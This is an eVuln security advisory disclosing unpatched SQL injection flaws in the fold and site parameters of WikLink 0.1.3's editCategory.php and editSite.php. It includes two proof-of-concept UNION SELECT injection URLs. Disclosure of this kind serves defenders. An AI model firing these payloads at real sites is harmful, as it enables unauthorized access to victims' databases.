fold and site SQL Injections in WikLink

Summary

Vulnerability
fold and site SQL Injections in WikLink
Discovered
2011.01.01
Last Update
n/a n/a
ID
EV0172
CVE
n/a
Risk Level
medium
Type
SQL Injection
Status
Unpatched. Vendor notified. No reply from developer(s).
Vendor
n/a
Vulnerable Software
WikLink (http://sourceforge.net/projects/wiklink/)
Version
0.1.3
PoC/Exploit
Available
Solution
Not available
Discovered by
Aliaksandr Hartsuyeu (eVuln.com)

Description

SQL Injection found in WikLink (http://sourceforge.net/projects/wiklink/) script.

SQL Injections
It is possible to inject arbitrary SQL query using fold and site parameters in editCategory.php and editSite.php scripts.

Parameters fold and site are used in SQL query without any sanitation.

Condition: magic_quotes: off

PoC/Exploit

SQL Injection PoC code.

SQL Injection example1:
http://website/wiklink/editCategory.php?action=edit&fold=9999'%20union%20select%201,2,3,4/*

SQL Injection example2:
http://website/wiklink/editSite.php?action=edit&site=999'%20union%20select%201,2,3,4,5/*

Solution.

Solution for "fold and site SQL Injections in WikLink" is not available. Check vendor's website for updates.